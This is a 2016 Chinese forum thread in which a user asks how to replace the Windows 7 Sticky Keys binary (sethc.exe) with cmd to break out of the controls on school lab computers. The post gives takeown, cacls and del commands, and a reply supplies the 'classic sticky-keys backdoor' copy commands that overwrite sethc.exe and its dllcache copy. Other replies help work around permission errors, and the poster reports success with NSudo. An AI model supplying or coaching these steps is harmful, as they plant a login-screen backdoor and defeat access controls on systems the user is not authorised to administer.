这是一个创建于 2986 天前的主题,其中的信息可能已经有所发展或是发生改变。
takeown /f c:\Windows\System32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
这两步成功了
del /F /S /Q /A c:\Windows\System32\sethc.exe
的时候又拒绝访问了
替换 cmd 学校机房解除控制用,
虚拟机上总是成功的..
WIN7旗舰版
cacls c:\windows\system32\sethc.exe /G administrator:F
这两步成功了
del /F /S /Q /A c:\Windows\System32\sethc.exe
的时候又拒绝访问了
替换 cmd 学校机房解除控制用,
虚拟机上总是成功的..
WIN7旗舰版
第 1 条附言 · 2016-09-19 12:23:39 +08:00
找到了个 NSudo.exe..简单暴力
 |
1
popok 2016-09-19 12:10:02 +08:00 via iPhone
你都能进系统了,直接手动替换也行吧。
你替换时观察一下,是不是有系统备份文件,比如 c:\windows\repair\这里,可能自动给你换回来了。 你可以先搜索 c 盘 sethc.exe ,然后搜索结果页不要关,执行你的替换命令,观察结果页里的文件大小变化 |
 |
2
lzhd24 2016-09-19 12:12:37 +08:00  1
还记得经典的 shift 粘滞键后门吗?
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y |
|
3
popok 2016-09-19 12:13:46 +08:00 via iPhone
好吧,没看仔细。
原来是权限问题,我上一贴回复作废好了。哈哈 |
|
4
popok 2016-09-19 12:16:59 +08:00 via iPhone
你先用 whoami 命令看看你本地登录的帐号是不是 administrator ,然后执行命令后,看看文件所有权里有没有这个
|
Select Language